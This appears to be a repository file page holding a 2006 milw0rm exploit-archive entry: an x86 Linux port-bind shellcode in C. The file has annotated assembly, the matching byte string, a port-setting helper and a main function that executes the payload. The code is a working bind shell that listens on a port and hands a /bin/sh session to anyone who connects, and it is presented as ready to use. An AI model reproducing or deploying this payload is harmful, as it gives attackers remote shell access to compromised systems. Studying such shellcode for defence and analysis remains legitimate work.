FilesExpand file tree

 master

/

13363.c

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

162 lines (149 loc) · 5.6 KB

 master

/

13363.c

Copy path

Top

File metadata and controls

• Code
• Blame

executable file

·

162 lines (149 loc) · 5.6 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

/*---------------------------------------------------------------------------*

* 100 byte Portbind shellcode *

* by Benjamin Orozco - benoror@gmail.com *

*---------------------------------------------------------------------------*

* filename: x86-linux-portbind.c *

* discription: x86-linux portbind shellcode. *

* Pretty big but excellent for educational purposes. *

* Use SET_PORT() before using the shellcode. Example: *

* *

* SET_PORT(sc, 31337); *

* *

*___________________________________________________________________________*

*---------------------------------------------------------------------------*/

/*---------------------------------------------------------------------------*

* ASM Code *

*---------------------------------------------------------------------------*

# s = socket(2, 1, 0)

push $0x66 #

pop %eax # 0x66 = socketcall

push $0x1 #

pop %ebx # socket() = 1

xor %ecx,%ecx #

push %ecx # 0

push $0x1 # SOCK_STREAM = 1

push $0x2 # AF_INET = 2

mov %esp,%ecx # Arguments

int $0x80 # EXECUTE - Now %eax have the s fileDescriptor

# bind(s [2, 64713, 0], 0x10)

xor %edx,%edx

push %edx # INADDR_ANY = 0

pushw $0xc9fc # PORT = 64713

pushw $0x2 # AF_INET = 2

mov %esp,%ecx # %ecx holds server struct

push $0x10 # sizeof(server) = 10

push %ecx # server struct

push %eax # s fileDescriptor

mov %esp,%ecx

mov %eax,%esi # now %esi holds s fileDescriptor

push $0x2 #

pop %ebx # bind() = 2

push $0x66 #

pop %eax # 0x66 = socketcall

int $0x80 # On success: %eax = 0

# listen(s, 0)

push $0x66 #

pop %eax # 0x66 = socketcall

push $0x4 #

pop %ebx # listen() = 4

int $0x80 # On success: %eax = 0

# c = accept(s, 0, 0)

xor %ecx,%ecx

push %ecx

push %ecx

push %esi # %esi = s

mov %esp,%ecx # Arguments

push $0x5 #

pop %ebx # accept() = 5

push $0x66 #

pop %eax # 0x66 = socketcall

int $0x80 # EXECUTE - Now %eax have c fileDescriptor

# dup2(c, 2) , dup2(c, 1) , dup2(c, 0)

xchg %eax,%ebx # Put c fileDescriptor on %ebx [for dup2()]

push $0x2

pop %ecx

dup_loop:

mov $0x3f,%al # dup2() = 0x3f

int $0x80

dec %ecx

jns dup_loop

# execve("/bin//sh", ["/bin//sh",NULL])

mov $0xb,%al # execve = 11d

push %edx

push $0x68732f2f

push $0x6e69622f

mov %esp,%ebx

push %edx

push %ebx

mov %esp, %ecx

int $0x80

*----------------------------------------------------------------------------*/

char sc[] =

"\x6a\x66" //push $0x66

"\x58" //pop %eax

"\x6a\x01" //push $0x1

"\x5b" //pop %ebx

"\x31\xc9" //xor %ecx,%ecx

"\x51" //push %ecx

"\x6a\x01" //push $0x1

"\x6a\x02" //push $0x2

"\x89\xe1" //mov %esp,%ecx

"\xcd\x80" //int $0x80

"\x31\xd2" //xor %edx,%edx

"\x52" //push %edx

"\x66\x68\xfc\xc9" //pushw $0xc9fc //PORT

"\x66\x6a\x02" //pushw $0x2

"\x89\xe1" //mov %esp,%ecx

"\x6a\x10" //push $0x10

"\x51" //push %ecx

"\x50" //push %eax

"\x89\xe1" //mov %esp,%ecx

"\x89\xc6" //mov %eax,%esi

"\x6a\x02" //push $0x2

"\x5b" //pop %ebx

"\x6a\x66" //push $0x66

"\x58" //pop %eax

"\xcd\x80" //int $0x80

"\x6a\x66" //push $0x66

"\x58" //pop %eax

"\x6a\x04" //push $0x4

"\x5b" //pop %ebx

"\xcd\x80" //int $0x80

"\x31\xc9" //xor %ecx,%ecx

"\x51" //push %ecx

"\x51" //push %ecx

"\x56" //push %esi

"\x89\xe1" //mov %esp,%ecx

"\x6a\x05" //push $0x5

"\x5b" //pop %ebx

"\x6a\x66" //push $0x66

"\x58" //pop %eax

"\xcd\x80" //int $0x80

"\x93" //xchg %eax,%ebx

"\x6a\x02" //push $0x2

"\x59" //pop %ecx

"\xb0\x3f" //mov $0x3f,%al

"\xcd\x80" //int $0x80

"\x49" //dec %ecx

"\x79\xf9" //jns 48 <dup_loop>

"\xb0\x0b" //mov $0xb,%al

"\x52" //push %edx

"\x68\x2f\x2f\x73\x68" //push $0x68732f2f

"\x68\x2f\x62\x69\x6e" //push $0x6e69622f

"\x89\xe3" //mov %esp,%ebx

"\x52" //push %edx

"\x53" //push %ebx

"\x89\xe1" //mov %esp,%ecx

"\xcd\x80"; //int $0x80

void SET_PORT(char *buf, int port) {

*(unsigned short *)(((buf)+22)) = (port);

char tmp = buf[22];

buf[22] = buf[23];

buf[23] = tmp;

}

main(){

printf("size: %d bytes\n", strlen(sc));

SET_PORT(sc, 33333);

__asm__("call sc");

}

// milw0rm.com [2006-05-08]